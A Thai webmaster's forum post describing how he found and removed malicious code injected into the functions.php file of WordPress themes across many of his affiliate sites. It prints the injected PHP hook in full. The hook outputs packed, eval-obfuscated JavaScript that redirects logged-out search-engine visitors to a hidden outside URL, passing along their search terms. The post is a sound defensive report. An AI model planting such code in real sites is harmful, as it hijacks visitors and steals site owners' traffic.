สืบเนื่องจากกระทู้
http://www.thaiseoboard.com/in...995.msg3300813.html#msg3300813 
ซึ่งตอนนั้นผมหลงผิดคิดว่าแก้ไขถูกทางแล้ว แต่พอมาเมื่อคืนนี้ เมื่อตรวจสอบดูอีกรอบพบว่า อาการถูก Redirect ยังเป็นอยู่เหมือนเดิม
หลังจากพิจารณาโดยรอบด้าน โดยตั้งข้อสังเกตุดังนี้1. รายได้จากอเมซอนในรอบประมาณ 1 เดือนที่ผ่านมา ลดลงไปกว่า 50% ใน Account เก่าๆ
2. รายได้จากอเมซอนในรอบประมาณ 1 เดือนที่ผ่านมา เริ่มขยับขึ้นเรื่อยๆ ใน Account ใหม่ๆ ที่พึ่งสมัคร
ตอนแรกนึกว่ามีผลมาจาก 2 สาเหตุคือ1. เว็บส่วนใหญ่ใน Account เก่าๆ จะเป็นเว็บที่ปั่นด้วย WPMU ซึ่งเนื้อหาไม่มีการ Rewrite ซึ่งอาจถูก Panda เล่นงาน ซึ่งตรงนี้มีส่วนจริง จากบางคีย์เวิร์ดที่ติดตามดู ซึ่งไม่สามารถติดตามได้ทั้งหมด ได้เลื่อนตกค่ำลงเกินกว่าหน้า 10 -20
2. ใกล้เทศกาลลดราคาที่มีหลายระลอกในช่วงท้ายปี คนที่ซื้อคงชลอการซื้อ ซึ่งสังเกตุได้จากสินค้าราคาสูงเริ่มขายได้น้อยลง สินค้าราคาต่ำยังพอขายได้
จาก 2 ประเด็นนี้ทำให้ไม่เอะใจใดๆ จนมาถึงคิว การทำเว็บเพื่อขาย Hostgator ใน ช่วง Black Friday นั้นและครับจึงเป็นที่มาของสาเหตุ ตามกระทู้นี้ครับ
http://www.thaiseoboard.com/in...995.msg3300813.html#msg3300813 สรุปผลการแก้ไข1.หลังจากย้อนรอยการทำงานเกี่ยวกับเว็บ ขาย Hostgator ซึ่งย้อนดูจากคู่แข่ง 10 อันดับในหน้าแรก ไม่มีใครถูก Redirect เลย มีเพียงเว็บของผมที่อยู่อันดับที่ 2-3 ในผลการค้นหาที่Google .com จึงตัดประเด็นการถูก Hack ที่เว็บนี้ออกไปก่อน
2.ข้อสงสัยตามมาคือทำไมเว็บ ขาย Hostgator ตัวนี้พึ่งสร้างได้ 2 วันจึงมีปัญหา เมื่อวิเคราะห็ดู พบว่าผมนำเอา Wordpres Themes จาก อีกเว็บอยู่คนละ Host มาใช้ เนื่องจากเป็น เว็บที่ขาย Hostgator เหมือนกัน แต่ติดตั้งเป็นเว็บปั่น จึงไม่ได้ติดตามดูคีย์เวิร์ดเพราะดูไม่ไหว อต่เว็บใหม่ที่ขาย Hostgator นี้ เป็นเว็บทำมือเน้นคุณภาพเป็นหลัก จึงมีโอกาสได้ติดตามคีย์เวิร์ดเป้าหมาย และเป็นที่มาของจากเจอปัญหา จึงพอที่จะตั้งประเด็นได้ว่า ต้องไปดูที่ Wordpress Themes ตัวนั้นๆ
3. เมื่อเข้าไปดู Wordpress Themes ตัวที่ใช้ กับต้นฉบับที่ดาวน์โหลดมา เอามาเทียบกัน จึงพบโค๊ดที่แปลกปลอมเข้ามา เมื่อดูโค๊ดก็เลยกระจ่างในทันที (เข้าใจซ่อนลิ้งค์ปลายทางไว้ด้วย โค..ร เนียนเลย เ.ร.) และเข้าใจได้ทันทีว่า โดน Hack เข้าแล้ว
4. คราวนี้แก้ไขตัดเอาโค๊ดออก เรียบร้อย ไม่มี Redirect ใดๆ เลย
5. เปิดรายการชื่อโดเมนราวสองร้อยโดเมนที่ใช้งานปัจจุบันอยู่ กระกระจายอยู่หลายๆ Host พบว่า เว็บที่เคยมี Order เรื่อยๆ แล้วหายไปทั้งนั้น และ ถูก Hack ในหลายๆ Host ด้วย
6. เมื่อไล่ดูเว็บที่ถูก Hack พบว่าคน Hack มันเลือกเฉพาะเว็บที่มีคีย์เวิร์ดติดหน้าแรกเท่านั้น เหมือนกับมันสามารถเข้าออกทุก Host ได้ดังใจ มันน่าจะตั้งต้นจากการหาคีย์เวิร์ดเป้าหมายก่อน และดูผลจากเว็บที่ Rank อยู่หน้าแรก จากนั้นก็เลือก Hack เว็บเป้าหมาย
7. วิธีแก้ให้แก้ที่ Wordpress Themes หลักที่ Enable อยู่ มันฝังโค๊ดไว้ที่ไฟล์ functions.php ของ Themes นั้นๆ
แสดงว่าคน Hack เป้าหมายของมันคือ ต้อนรับ Black Friday ข้างล่างนี้คือโค๊ดที่มันฝังไว้ครับ
<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('�' e(c) '�','g'),k[c]);return p}('o r=a.e,t="",q;5(r.4("m.")!=-1)t="q";5(r.4("b.")!=-1)t="q";5(r.4("c.")!=-1)t="p";5(r.4("f.")!=-1)t="q";5(r.4("g.")!=-1)t="h";5(r.4("i.")!=-1)t="q";5(t.6&&((q=r.4("?" t "="))!=-1||(q=r.4("&" t "="))!=-1))j.k="l://9" "1." "n" "3" "." "8" "9.1" "s/" "u.p" "v?w" "d=7&t" "x" "y=" r.z(q 2 t.6).A("&")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))</script>";
}
}
}
?>
ความรู้ทั่วไป
